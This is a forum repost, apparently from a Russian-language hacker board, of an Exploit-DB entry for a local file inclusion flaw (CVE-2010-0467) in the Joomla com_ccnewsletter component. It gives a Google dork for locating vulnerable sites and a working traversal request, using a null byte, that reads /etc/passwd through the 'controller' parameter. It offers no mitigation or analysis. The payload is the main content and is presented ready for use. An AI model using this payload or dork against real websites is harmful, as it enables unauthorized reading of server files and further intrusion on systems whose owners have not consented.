Exploit Joomla! Component CCNewsLetter - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11282
Проверка EDB
  1. Пройдено
Автор
ATT4CKXT3RR0R1ST
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-0467
Дата публикации
2010-01-28
Код:
Joomla Component com_ccnewsletter Local File Inclusion
==========================================================

###########################################
.:. Author         : AtT4CKxT3rR0r1ST

.:. Email          : [email protected]

.:. Home           : www.sec-attack.com/vb

.:. Script         : Joomla Component com_ccnewsletter

.:. Bug Type       : Local File Inclusion [LFI]

.:. Dork           : inurl:"com_ccnewsletter"

.:. Date           : 28/1/2010

#############################################

===[ Exploit ]===

http://server/index.php?option=com_ccnewsletter&controller=[LFI]

http://server/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00


#############################################

Greats T0: My Mind & All member Sec Attack
 
Источник
www.exploit-db.com

Похожие темы